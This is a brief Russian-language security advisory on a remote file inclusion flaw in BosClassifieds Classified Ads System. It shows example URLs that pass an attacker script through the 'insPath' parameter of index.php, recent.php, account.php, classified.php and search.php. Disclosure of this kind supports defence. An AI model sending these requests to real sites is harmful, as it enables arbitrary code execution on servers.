Программа: BosClassifieds Classified Ads System

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре "insPath" в сценариях index.php, recent.php, account.php, classified.php и search.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

Пример:

http://www.site.com/[path]/index.php?insPath=[evil_script]
http://www.site.com/[path]/recent.php?insPath=[evil_script]
http://www.site.com/[path]/account.php?insPath=[evil_script]
http://www.site.com/[path]/classified.php?insPath=[evil_script]
http://www.site.com/[path]/search.php?insPath=[evil_script]



Оставить мнение